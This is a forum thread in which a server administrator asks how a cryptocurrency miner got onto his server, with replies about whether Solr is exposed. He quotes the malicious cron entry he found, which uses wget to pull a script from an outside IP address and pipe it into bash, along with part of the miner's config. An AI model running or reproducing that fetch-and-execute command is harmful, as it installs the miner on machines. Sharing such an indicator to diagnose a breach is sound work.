Crypto miner got on my server - but how?
Hi,
We noticed that the server was running at super high CPU loads (almost 800%, on a 32gb Linode with 8 cores). After some digging we found it was a crypto miner. We think we have got rid of it - BUT how could they have got in? Our passwords are 30+ charachters long and a mix of letters, digits, and other special charachters, so I'm pretty sure they didn't get in with a brute force. We also have fail2ban setup.
Are there any other ways they could have got in?
They installed a cron as the solr user:
- * * * * wget -q -O - http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1
…and this creates a mining profile with wc.conf that has stuff like:
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
Does anyone have any insight on where we could look? We are going to rebuild the server to make sure that no backdoors are left in, but I'm a bit concerned the original entry point could still be unprotected if we don't know what caused it :(
TIA
Andy
2 Replies
Is your Solr public facing for some reason? It should just listen to localhost, nothing else.
Hi Woet,
Thanks for the reply. Solr itself isn't, but I can access it by adding the IP into my local IP (so I can get into the admin area). It's also locked down by an IP block
It looks like his other server was also compromised. Same hack, but in a different folder. The other server doesn't have solr on (it was running as gcc).
Thanks
Andy